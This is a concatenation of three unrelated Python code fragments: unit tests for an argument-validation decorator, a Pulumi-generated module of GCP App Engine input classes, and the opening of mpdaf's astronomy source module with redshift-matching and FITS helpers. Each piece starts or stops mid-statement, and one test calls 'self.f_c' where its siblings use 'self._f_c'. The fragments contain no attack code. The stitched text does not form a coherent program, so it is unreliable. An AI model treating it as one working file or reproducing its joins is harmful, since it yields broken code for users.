self._f_c.assert_not_called() self._f_a.assert_called_once_with('a', 0, 11) else: assert False def 
test_analyse_sig_strict_with_on_error_handler_fail_slow(self): def f_a(name, index, value): self._f_a(name, index, value) print('f_a: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('a') def f_c(name, index, value): self._f_c(name, index, value) print('f_c: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('c') def f_f(name, index, called_with_value, default_value): self._f_f(name, index, called_with_value, default_value) print( 'f_c: name: {0}, index:{1}, called_with_value: {2}, default_value: {3}'.format( name, index, called_with_value, default_value)) raise _Error('f') def f_on_error(exc, errors): self._f_on_error(exc, errors) print('f_on_error exc: {0}'.format(str(exc))) print('f_on_error errors: {0}'.format(str(errors))) raise _Error('on_error') @analyse_sig( f_a, IGNORE, f_c, c=IGNORE, d=IGNORE, f=f_f, _fail_fast_=False, _on_error_=f_on_error, _strict_=True, ) def voo(a, b, c, d, e=1, f='2', g={3: 4}, **kwargs): raise _Success() try: voo(11, 22, 33, 44, e=99) except _Error as e: self.assertEqual(e.message, 'on_error') self.assertEqual(self._f_on_error.call_count, 1) self._f_f.assert_called_once_with('f', 5, NOVALUE, '2') self._f_c.assert_called_once_with('c', 2, 33) self._f_a.assert_called_once_with('a', 0, 11) else: assert False def test_analyse_sig_strict_with_on_error_handler_fail_fast(self): def f_a(name, index, value): self._f_a(name, index, value) print('f_a: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('a') def f_c(name, index, value): self.f_c(name, index, value) print('f_c: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('c') def f_f(name, index, called_with_value, default_value): self._f_f(name, index, called_with_value, default_value) print( 'f_c: name: {0}, index:{1}, called_with_value: {2}, default_value: {3}'.format( name, index, called_with_value, default_value)) raise _Error('f') def f_on_error(exc, errors): self._f_on_error(exc, 
errors) print('f_on_error exc: {0}'.format(str(exc))) print('f_on_error errors: {0}'.format(str(errors))) raise _Error('on_error') @analyse_sig( f_a, IGNORE, f_c, c=IGNORE, d=IGNORE, f=f_f, _fail_fast_=True, _on_error_=f_on_error, _strict_=True, ) def voo(a, b, c, d, e=1, f='2', g={3: 4}, **kwargs): raise _Success() try: voo(11, 22, 33, 44, e=99) except _Error as e: self.assertEqual(e.message, 'on_error') self.assertEqual(self._f_on_error.call_count, 1) cargs = self._f_on_error.call_args_list[0][0] self.assertIsInstance(cargs[0], _Error) self.assertEqual(cargs[0].message, 'a') self.assertEqual(len(cargs[1]), 1) err = cargs[1][0] self.assertIsInstance(err, PositionalError) self.assertEqual(err.func_name, 'f_a') self.assertEqual(err.index, 0) self.assertEqual(err.name, 'a') self.assertEqual(err.value, 11) self._f_f.assert_not_called() self._f_c.assert_not_called() self._f_a.assert_called_once_with('a', 0, 11) else: assert False def test_analyse_sig_not_strict_without_on_error_handler_fail_fast(self): def f_a(name, index, value): self._f_a(name, index, value) print('f_a: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('a') def f_c(name, index, value): self._f_c(name, index, value) print('f_c: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('c') def f_f(name, index, called_with_value, default_value): self._f_f(name, index, called_with_value, default_value) print( 'f_c: name: {0}, index:{1}, called_with_value: {2}, default_value: {3}'.format( name, index, called_with_value, default_value)) raise _Error('f') @analyse_sig( f_a, IGNORE, f_c, c=IGNORE, d=IGNORE, f=f_f, _fail_fast_=True, _strict_=False, ) def voo(a, b, c, d, e=1, f='2', g={3: 4}, **kwargs): raise _Success() try: voo(11, 22, 33, 44, e=99) except _Error as e: self.assertEqual(e.message, 'a') errors = e._errors_ self.assertIsInstance(errors, list) self.assertEqual(len(errors), 1) print('errors: {0}'.format(errors)) err = errors[0] self.assertIsInstance(err, 
PositionalError) self.assertIsInstance(err.error, _Error) self.assertEqual(err.error.message, 'a') self.assertEqual(err.func_name, 'f_a') self.assertEqual(err.index, 0) self.assertEqual(err.name, 'a') self.assertEqual(err.value, 11) self._f_f.assert_not_called() self._f_c.assert_not_called() self._f_a.assert_called_once_with('a', 0, 11) else: assert False def test_analyse_sig_not_strict_without_on_error_handler_fail_slow(self): def f_a(name, index, value): self._f_a(name, index, value) print('f_a: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('a') def f_c(name, index, value): self._f_c(name, index, value) print('f_c: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('c') def f_f(name, index, called_with_value, default_value): self._f_f(name, index, called_with_value, default_value) print( 'f_c: name: {0}, index:{1}, called_with_value: {2}, default_value: {3}'.format( name, index, called_with_value, default_value)) raise _Error('f') def f_on_error(exc, errors): self._f_on_error(exc, errors) print('f_on_error exc: {0}'.format(str(exc))) print('f_on_error errors: {0}'.format(str(errors))) raise _Error('on_error') @analyse_sig( f_a, IGNORE, f_c, c=IGNORE, d=IGNORE, f=f_f, _fail_fast_=False, _strict_=False, ) def voo(a, b, c, d, e=1, f='2', g={3: 4}, **kwargs): raise _Success() try: voo(11, 22, 33, 44, e=99) except _Error as e: self.assertEqual(e.message, 'a') self.assertEqual(self._f_on_error.call_count, 0) errors = e._errors_ self.assertIsInstance(errors, list) self.assertEqual(len(errors), 3) print('errors: {0}'.format(errors)) err = errors[0] self.assertIsInstance(err, PositionalError) self.assertIsInstance(err.error, _Error) self.assertEqual(err.error.message, 'a') self.assertEqual(err.func_name, 'f_a') self.assertEqual(err.index, 0) self.assertEqual(err.name, 'a') self.assertEqual(err.value, 11) print('errors: {0}'.format(errors)) error = errors[0] self.assertIsInstance(error, PositionalError) 
self.assertIsInstance(error.error, _Error) self.assertEqual(error.name, 'a') self.assertEqual(error.value, 11) self.assertEqual(error.func_name, 'f_a') self.assertEqual(error.func, f_a) self.assertEqual(error.error.message, 'a') error = errors[1] self.assertIsInstance(error, PositionalError) self.assertIsInstance(error.error, _Error) self.assertEqual(error.name, 'c') self.assertEqual(error.value, 33) self.assertEqual(error.func_name, 'f_c') self.assertEqual(error.func, f_c) self.assertEqual(error.error.message, 'c') error = errors[2] self.assertIsInstance(error, KeywordError) self.assertIsInstance(error.error, _Error) self.assertEqual(error.name, 'f') self.assertEqual(error.value, NOVALUE) self.assertEqual(error.func_name, 'f_f') self.assertEqual(error.func, f_f) self.assertEqual(error.error.message, 'f') self.assertEqual(error.default_value, '2') self._f_on_error.assert_not_called() self._f_f.assert_called_once_with('f', 5, NOVALUE, '2') self._f_c.assert_called_once_with('c', 2, 33) self._f_a.assert_called_once_with('a',
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
# NOTE(review): generated module — only comments were added below; all code is
# reproduced verbatim from the generator output.

import warnings
import pulumi
import pulumi.runtime
from typing import Any, Dict, List, Mapping, Optional, Tuple, Union
from .. import _utilities, _tables

# Public input-type surface of this module (GCP App Engine resources).
__all__ = [
    'ApplicationFeatureSettingsArgs',
    'ApplicationIapArgs',
    'ApplicationUrlDispatchRuleArgs',
    'ApplicationUrlDispatchRulesDispatchRuleArgs',
    'DomainMappingResourceRecordArgs',
    'DomainMappingSslSettingsArgs',
    'EngineSplitTrafficSplitArgs',
    'FlexibleAppVersionApiConfigArgs',
    'FlexibleAppVersionAutomaticScalingArgs',
    'FlexibleAppVersionAutomaticScalingCpuUtilizationArgs',
    'FlexibleAppVersionAutomaticScalingDiskUtilizationArgs',
    'FlexibleAppVersionAutomaticScalingNetworkUtilizationArgs',
    'FlexibleAppVersionAutomaticScalingRequestUtilizationArgs',
    'FlexibleAppVersionDeploymentArgs',
    'FlexibleAppVersionDeploymentCloudBuildOptionsArgs',
    'FlexibleAppVersionDeploymentContainerArgs',
    'FlexibleAppVersionDeploymentFileArgs',
    'FlexibleAppVersionDeploymentZipArgs',
    'FlexibleAppVersionEndpointsApiServiceArgs',
    'FlexibleAppVersionEntrypointArgs',
    'FlexibleAppVersionHandlerArgs',
    'FlexibleAppVersionHandlerScriptArgs',
    'FlexibleAppVersionHandlerStaticFilesArgs',
    'FlexibleAppVersionLivenessCheckArgs',
    'FlexibleAppVersionManualScalingArgs',
    'FlexibleAppVersionNetworkArgs',
    'FlexibleAppVersionReadinessCheckArgs',
    'FlexibleAppVersionResourcesArgs',
    'FlexibleAppVersionResourcesVolumeArgs',
    'FlexibleAppVersionVpcAccessConnectorArgs',
    'StandardAppVersionAutomaticScalingArgs',
    'StandardAppVersionAutomaticScalingStandardSchedulerSettingsArgs',
    'StandardAppVersionBasicScalingArgs',
    'StandardAppVersionDeploymentArgs',
    'StandardAppVersionDeploymentFileArgs',
    'StandardAppVersionDeploymentZipArgs',
    'StandardAppVersionEntrypointArgs',
    'StandardAppVersionHandlerArgs',
    'StandardAppVersionHandlerScriptArgs',
    'StandardAppVersionHandlerStaticFilesArgs',
    'StandardAppVersionLibraryArgs',
    'StandardAppVersionManualScalingArgs',
    'StandardAppVersionVpcAccessConnectorArgs',
]


@pulumi.input_type
class ApplicationFeatureSettingsArgs:
    def __init__(__self__, *,
                 split_health_checks: pulumi.Input[bool]):
        """
        :param pulumi.Input[bool] split_health_checks: Set to false to use the legacy health check instead of the readiness
               and liveness checks.
        """
        pulumi.set(__self__, "split_health_checks", split_health_checks)

    @property
    @pulumi.getter(name="splitHealthChecks")
    def split_health_checks(self) -> pulumi.Input[bool]:
        """
        Set to false to use the legacy health check instead of the readiness
        and liveness checks.
        """
        return pulumi.get(self, "split_health_checks")

    @split_health_checks.setter
    def split_health_checks(self, value: pulumi.Input[bool]):
        pulumi.set(self, "split_health_checks", value)


@pulumi.input_type
class ApplicationIapArgs:
    def __init__(__self__, *,
                 oauth2_client_id: pulumi.Input[str],
                 oauth2_client_secret: pulumi.Input[str],
                 enabled: Optional[pulumi.Input[bool]] = None,
                 oauth2_client_secret_sha256: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] oauth2_client_id: OAuth2 client ID to use for the authentication flow.
        :param pulumi.Input[str] oauth2_client_secret: OAuth2 client secret to use for the authentication flow.
               The SHA-256 hash of the value is returned in the oauth2ClientSecretSha256 field.
        :param pulumi.Input[str] oauth2_client_secret_sha256: Hex-encoded SHA-256 hash of the client secret.
        """
        pulumi.set(__self__, "oauth2_client_id", oauth2_client_id)
        pulumi.set(__self__, "oauth2_client_secret", oauth2_client_secret)
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)
        if oauth2_client_secret_sha256 is not None:
            pulumi.set(__self__, "oauth2_client_secret_sha256", oauth2_client_secret_sha256)

    @property
    @pulumi.getter(name="oauth2ClientId")
    def oauth2_client_id(self) -> pulumi.Input[str]:
        """
        OAuth2 client ID to use for the authentication flow.
        """
        return pulumi.get(self, "oauth2_client_id")

    @oauth2_client_id.setter
    def oauth2_client_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "oauth2_client_id", value)

    @property
    @pulumi.getter(name="oauth2ClientSecret")
    def oauth2_client_secret(self) -> pulumi.Input[str]:
        """
        OAuth2 client secret to use for the authentication flow.
        The SHA-256 hash of the value is returned in the oauth2ClientSecretSha256 field.
        """
        return pulumi.get(self, "oauth2_client_secret")

    @oauth2_client_secret.setter
    def oauth2_client_secret(self, value: pulumi.Input[str]):
        pulumi.set(self, "oauth2_client_secret", value)

    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        # No upstream description generated for this field.
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)

    @property
    @pulumi.getter(name="oauth2ClientSecretSha256")
    def oauth2_client_secret_sha256(self) -> Optional[pulumi.Input[str]]:
        """
        Hex-encoded SHA-256 hash of the client secret.
        """
        return pulumi.get(self, "oauth2_client_secret_sha256")

    @oauth2_client_secret_sha256.setter
    def oauth2_client_secret_sha256(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "oauth2_client_secret_sha256", value)


@pulumi.input_type
class ApplicationUrlDispatchRuleArgs:
    def __init__(__self__, *,
                 domain: Optional[pulumi.Input[str]] = None,
                 path: Optional[pulumi.Input[str]] = None,
                 service: Optional[pulumi.Input[str]] = None):
        if domain is not None:
            pulumi.set(__self__, "domain", domain)
        if path is not None:
            pulumi.set(__self__, "path", path)
        if service is not None:
            pulumi.set(__self__, "service", service)

    @property
    @pulumi.getter
    def domain(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "domain")

    @domain.setter
    def domain(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "domain", value)

    @property
    @pulumi.getter
    def path(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "path")

    @path.setter
    def path(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "path", value)

    @property
    @pulumi.getter
    def service(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "service")

    @service.setter
    def service(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "service", value)


@pulumi.input_type
class ApplicationUrlDispatchRulesDispatchRuleArgs:
    def __init__(__self__, *,
                 path: pulumi.Input[str],
                 service: pulumi.Input[str],
                 domain: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] path: Pathname within the host. Must start with a "/". A single "*" can be included at the end of the path.
               The sum of the lengths of the domain and path may not exceed 100 characters.
        :param pulumi.Input[str] service: Pathname within the host. Must start with a "/". A single "*" can be included at the end of the path.
               The sum of the lengths of the domain and path may not exceed 100 characters.
        :param pulumi.Input[str] domain: Domain name to match against. The wildcard "*" is supported if specified before a period: "*.".
               Defaults to matching all domains: "*".
        """
        pulumi.set(__self__, "path", path)
        pulumi.set(__self__, "service", service)
        if domain is not None:
            pulumi.set(__self__, "domain", domain)

    @property
    @pulumi.getter
    def path(self) -> pulumi.Input[str]:
        """
        Pathname within the host. Must start with a "/". A single "*" can be included at the end of the path.
        The sum of the lengths of the domain and path may not exceed 100 characters.
        """
        return pulumi.get(self, "path")

    @path.setter
    def path(self, value: pulumi.Input[str]):
        pulumi.set(self, "path", value)

    @property
    @pulumi.getter
    def service(self) -> pulumi.Input[str]:
        """
        Pathname within the host. Must start with a "/". A single "*" can be included at the end of the path.
        The sum of the lengths of the domain and path may not exceed 100 characters.
        """
        return pulumi.get(self, "service")

    @service.setter
    def service(self, value: pulumi.Input[str]):
        pulumi.set(self, "service", value)

    @property
    @pulumi.getter
    def domain(self) -> Optional[pulumi.Input[str]]:
        """
        Domain name to match against. The wildcard "*" is supported if specified before a period: "*.".
        Defaults to matching all domains: "*".
        """
        return pulumi.get(self, "domain")

    @domain.setter
    def domain(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "domain", value)


@pulumi.input_type
class DomainMappingResourceRecordArgs:
    def __init__(__self__, *,
                 name: Optional[pulumi.Input[str]] = None,
                 rrdata: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        if name is not None:
            pulumi.set(__self__, "name", name)
        if rrdata is not None:
            pulumi.set(__self__, "rrdata", rrdata)
        if type is not None:
            pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def rrdata(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "rrdata")

    @rrdata.setter
    def rrdata(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "rrdata", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)


@pulumi.input_type
class DomainMappingSslSettingsArgs:
    def __init__(__self__, *,
                 ssl_management_type: pulumi.Input[str],
                 certificate_id: Optional[pulumi.Input[str]] = None,
                 pending_managed_certificate_id: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] ssl_management_type: SSL management type for this domain. If `AUTOMATIC`, a managed certificate is automatically provisioned.
               If `MANUAL`, `certificateId` must be manually specified in order to configure SSL for this domain.
               Possible values are `AUTOMATIC` and `MANUAL`.
        :param pulumi.Input[str] certificate_id: ID of the AuthorizedCertificate resource configuring SSL for the application. Clearing this field will
               remove SSL support.
               By default, a managed certificate is automatically created for every domain mapping. To omit SSL support
               or to configure SSL manually, specify `SslManagementType.MANUAL` on a `CREATE` or `UPDATE` request. You must be
               authorized to administer the `AuthorizedCertificate` resource to manually map it to a DomainMapping resource.
               Example: 12345.
        :param pulumi.Input[str] pending_managed_certificate_id: - ID of the managed `AuthorizedCertificate` resource currently being provisioned, if applicable. Until the new
               managed certificate has been successfully provisioned, the previous SSL state will be preserved. Once the
               provisioning process completes, the `certificateId` field will reflect the new managed certificate and this
               field will be left empty. To remove SSL support while there is still a pending managed certificate, clear the
               `certificateId` field with an update request.
        """
        pulumi.set(__self__, "ssl_management_type", ssl_management_type)
        if certificate_id is not None:
            pulumi.set(__self__, "certificate_id", certificate_id)
        if pending_managed_certificate_id is not None:
            pulumi.set(__self__, "pending_managed_certificate_id", pending_managed_certificate_id)

    @property
    @pulumi.getter(name="sslManagementType")
    def ssl_management_type(self) -> pulumi.Input[str]:
        """
        SSL management type for this domain. If `AUTOMATIC`, a managed certificate is automatically provisioned.
        If `MANUAL`, `certificateId` must be manually specified in order to configure SSL for this domain.
        Possible values are `AUTOMATIC` and `MANUAL`.
        """
        return pulumi.get(self, "ssl_management_type")

    @ssl_management_type.setter
    def ssl_management_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "ssl_management_type", value)

    @property
    @pulumi.getter(name="certificateId")
    def certificate_id(self) -> Optional[pulumi.Input[str]]:
        """
        ID of the AuthorizedCertificate resource configuring SSL for the application. Clearing this field will
        remove SSL support.
        By default, a managed certificate is automatically created for every domain mapping. To omit SSL support
        or to configure SSL manually, specify `SslManagementType.MANUAL` on a `CREATE` or `UPDATE` request. You must be
        authorized to administer the `AuthorizedCertificate` resource to manually map it to a DomainMapping resource.
        Example: 12345.
        """
        return pulumi.get(self, "certificate_id")

    @certificate_id.setter
    def certificate_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "certificate_id", value)

    @property
    @pulumi.getter(name="pendingManagedCertificateId")
    def pending_managed_certificate_id(self) -> Optional[pulumi.Input[str]]:
        """
        - ID of the managed `AuthorizedCertificate` resource currently being provisioned, if applicable. Until the new
        managed certificate has been successfully provisioned, the previous SSL state will be preserved. Once the
        provisioning process completes, the `certificateId` field will reflect the new managed certificate and this
        field will be left empty. To remove SSL support while there is still a pending managed certificate, clear the
        `certificateId` field with an update request.
        """
        return pulumi.get(self, "pending_managed_certificate_id")

    @pending_managed_certificate_id.setter
    def pending_managed_certificate_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "pending_managed_certificate_id", value)


# NOTE(review): the chunk is truncated below — this __init__ docstring is cut
# off mid-sentence by the extraction; the remainder lies outside this view.
@pulumi.input_type
class EngineSplitTrafficSplitArgs:
    def __init__(__self__, *,
                 allocations: pulumi.Input[Mapping[str, pulumi.Input[str]]],
                 shard_by: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] allocations: Mapping from version IDs within the
<reponame>musevlt/mpdaf<filename>lib/mpdaf/sdetect/source.py """ Copyright (c) 2010-2018 CNRS / Centre de Recherche Astrophysique de Lyon Copyright (c) 2015-2017 <NAME> <<EMAIL>> Copyright (c) 2015-2019 <NAME> <<EMAIL>> Copyright (c) 2015-2019 <NAME> <<EMAIL>> Copyright (c) 2015-2019 <NAME> <<EMAIL>> Copyright (c) 2016 <NAME> <<EMAIL>> Copyright (c) 2018-2019 <NAME> <<EMAIL>> Copyright (c) 2018 <NAME> <<EMAIL>> All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
""" import astropy.units as u import collections.abc import datetime import glob import logging import numpy as np import os import re import shutil import warnings from astropy.io import fits as pyfits from astropy.table import Table, MaskedColumn, Column, vstack from functools import partial from numpy import ma from scipy.optimize import leastsq from ..obj import Cube, Image, Spectrum, vactoair, airtovac, plot_rgb from ..obj.objs import is_int, is_float, bounding_box from ..tools import MpdafWarning from ..MUSE import FieldsMap, FSFModel, MoffatModel2 from ..MUSE.PSF import MOFFAT1, create_psf_cube from ..sdetect.sea import (segmentation, findCentralDetection, union, intersection, compute_optimal_spectrum) __all__ = ('Source', 'SourceList', 'matchlines', 'crackz') emlines = {1215.67: 'LYALPHA1216', 1550.0: 'CIV1550', 1909.0: 'CIII]1909', 2326.0: 'CII2326', 2801.0: 'MgII2801', 3726.032: '[OII]3726', 3728.8149: '[OII]3729', 3798.6001: 'HTHETA3799', 3834.6599: 'HETA3835', 3869.0: '[NeIII]3869', 3888.7: 'HZETA3888', 3967.0: '[NeIII]3967', 4102.0: 'HDELTA4102', 4340.0: 'HGAMMA4340', 4861.3198: 'HBETA4861', 4959.0: '[OIII]4959', 5007.0: '[OIII]5007', 6548.0: '[NII]6548', 6562.7998: 'HALPHA6563', 6583.0: '[NII]6583', 6716.0: '[SII]6716', 6731.0: '[SII]6731'} STR_DTYPE = 'U20' TABLES_SCHEMA = { # Version of the source format, see SourceICD.pdf 'version': '0.6', 'MAG': { 'BAND': { 'description': 'Filter name', 'dtype': STR_DTYPE, 'primary_index': True }, 'MAG': { 'format': '.3f', 'description': 'AB Magnitude', 'unit': 'mag', 'dtype': 'f8' }, 'MAG_ERR': { 'format': '.3f', 'description': 'Error in AB Magnitude', 'unit': 'mag', 'dtype': 'f8' } }, 'Z': { 'Z': { 'description': 'Estimated redshift', 'format': '.4f', 'unit': '', # dimensionless_unscaled 'dtype': 'f8' }, 'Z_MIN': { 'description': 'Lower bound of estimated redshift', 'format': '.4f', 'unit': '', # dimensionless_unscaled 'dtype': 'f8' }, 'Z_MAX': { 'description': 'Upper bound of estimated redshift', 'format': 
'.4f', 'unit': '', # dimensionless_unscaled 'dtype': 'f8' }, 'Z_DESC': { 'description': 'Type of redshift', 'dtype': STR_DTYPE, 'primary_index': True } } } def _set_table_attributes(name, table): for colname, attributes in TABLES_SCHEMA[name].items(): for attr, value in attributes.items(): if attr not in ('dtype', 'primary_index'): setattr(table[colname], attr, value) elif attr == 'primary_index': table.add_index(colname, unique=True) def _headercorrected(hdr): """Handle keywords that have been renamed.""" # COM*** -> COMMENT i = 1 while 'COM%03d' % i in hdr: value = hdr['COM%03d' % i] comment = hdr.cards['COM%03d' % i].comment hdr['COMMENT'] = '[%s] %s' % (comment, value) del hdr['COM%03d' % i] i += 1 # HIST*** -> HISTORY i = 1 while 'HIST%03d' % i in hdr: value = hdr['HIST%03d' % i] comment = hdr.cards['HIST%03d' % i].comment hdr['HISTORY'] = '%s (%s)' % (value, comment) del hdr['HIST%03d' % i] i += 1 # ORIGIN -> FROM if 'ORIGIN' in hdr.keys(): hdr.rename_keyword('ORIGIN', 'FROM') if 'ORIGIN_V' in hdr.keys(): hdr.rename_keyword('ORIGIN_V', 'FROM_V') # SOURCE_V -> FORMAT if 'SOURCE_V' in hdr.keys(): hdr.rename_keyword('SOURCE_V', 'FORMAT') # SRC_VERS -> SRC_V if 'SRC_VERS' in hdr.keys(): hdr.rename_keyword('SRC_VERS', 'SRC_V') def matchlines(nlines, wl, z, eml): """Try to match all the lines given. For each line computes the distance in Angstroms to the closest line. Add the errors Algorithm from <NAME> (<EMAIL>) Parameters ---------- nlines : int Number of emission lines wl : array of float Table of wavelengths z : float Redshift to test eml : dict Full catalog of lines to test redshift. key: wavelength, value: name. Returns ------- out : (array of float, array of float) (list of wavelengths, errors) """ lbdas = np.array(list(eml.keys())) a = (wl[:, np.newaxis] / (1 + z) - lbdas[np.newaxis, :]) ** 2.0 jfound = np.argmin(a, axis=1) error = np.diag(a[:, jfound]).sum() error = np.sqrt(error / nlines) if((nlines >= 2)and(jfound[0] == jfound[1])): error = 15. 
return(error, jfound) def crackz(nlines, wl, flux, eml, zguess=None): """Method to estimate the best redshift matching a list of emission lines. Algorithm from <NAME> (<EMAIL>) Parameters ---------- nlines : int Number of emission lines wl : array of float Table of observed line wavelengths flux : array of float Table of line fluxes eml : dict Full catalog of lines to test redshift zguess : float Guess redshift to test (only this) Returns ------- out : (float, float, int, list of float, list of float, list of str) (redshift, redshift error, list of wavelengths, list of fluxes, list of lines names) """ errmin = 3.0 found = 0 lnames = np.array(list(eml.values())) lbdas = np.array(list(eml.keys())) if(nlines == 0): return -9999.0, -9999.0, 0, [], [], [] if(nlines == 1): return -9999.0, -9999.0, 1, wl, flux, ["Lya/[OII]"] if zguess: (error, jfound) = matchlines(nlines, wl, zguess, eml) if(error < errmin): return zguess, -9999.0, 1, wl, flux, list(lnames[jfound[0]]) else: return zguess, -9999.0, 1, [], [], [] # test all redshift combinations for n in range(nlines): for p in range(lbdas.shape[0]): ztest = wl[n] / lbdas[p] - 1.0 if(ztest >= 0): (error, jfound) = matchlines(nlines, wl, ztest, eml) if(error < errmin): errmin = error found = 1 zfound = ztest jfinal = jfound.copy() if(found == 1): jfinal = np.array(jfinal).astype(int) return zfound, errmin / np.min(lbdas[jfinal]), nlines, \ wl, flux, list(lnames[jfinal[0:nlines]]) else: if(nlines > 3): # keep the three brightest ksel = np.argsort(flux)[-1:-4:-1] return crackz(3, wl[ksel], flux[ksel], eml) if(nlines == 3): # keep the two brightest ksel = np.argsort(flux)[-1:-3:-1] return crackz(2, wl[ksel], flux[ksel], eml) if(nlines == 2): # keep the brightest ksel = np.argsort(flux)[-1] return crackz(1, [wl[ksel]], [flux[ksel]], eml) return -9999.0, -9999.0, 0, [], [], [] def _mask_invalid(tables): tables = [tables] if isinstance(tables, Table) else tables for tab in tables: if tab is not None: for name, col in 
tab.columns.items(): try: tab[name] = ma.masked_invalid(col) tab[name] = ma.masked_equal(col, -9999) except Exception: pass def _read_ext(cls, hdulist, extname, **kwargs): """Read an extension from a FITS HDUList.""" try: if cls == Table: # use Table.read method to ensure extra header keywords are loaded # as metadata obj = Table.read(hdulist, hdu=extname) obj = Table(obj, **kwargs) else: obj = cls(hdulist[extname].data, **kwargs) except Exception as e: raise IOError('%s: Impossible to open extension %s as a %s\n%s' % ( os.path.basename(hdulist.filename()), extname, cls.__name__, e)) return obj def _read_mpdaf_obj(cls, hdulist, ext, **kwargs): """Read an extension from a FITS HDUList and return an MPDAF object.""" filename = hdulist.filename() try: obj = cls(filename=filename, hdulist=hdulist, ext=ext, **kwargs) except Exception as e: raise IOError('%s: Impossible to open extension %s as a %s\n%s' % ( os.path.basename(filename), ext, cls.__name__, e)) return obj def _read_table(hdulist, extname, **kwargs): """Read a masked Table from a FITS HDUList.""" t = _read_ext(Table, hdulist, extname, **kwargs) h = hdulist[extname].header for i in range(h['TFIELDS']): try: t.columns[i].unit = h['TUNIT%d' % (i + 1)] except Exception: pass return t def _remove_hdu(hdulist, name): try: del hdulist[name] except KeyError: pass def _insert_or_update_hdu(hdulist, name, hdu): try: idx = hdulist.index_of(name) hdulist[idx] = hdu except KeyError: hdulist.append(hdu) def _write_mpdaf_obj(obj, type_, name, hdulist): ext_name = '{}_{}_DATA'.format(type_, name) savemask = 'nan' if obj.data.dtype.kind == 'f' else 'dq' datahdu = obj.get_data_hdu(name=ext_name, savemask=savemask) _insert_or_update_hdu(hdulist, ext_name, datahdu) ext_name = '{}_{}_STAT'.format(type_, name) hdu = obj.get_stat_hdu(name=ext_name, header=datahdu.header) if hdu is not None: _insert_or_update_hdu(hdulist, ext_name, hdu) if savemask == 'dq': ext_name = '{}_{}_DQ'.format(type_, name) hdu = 
obj.get_dq_hdu(name=ext_name, header=datahdu.header) if hdu is not None: _insert_or_update_hdu(hdulist, ext_name, hdu) def _write_table(table, name, hdulist): if
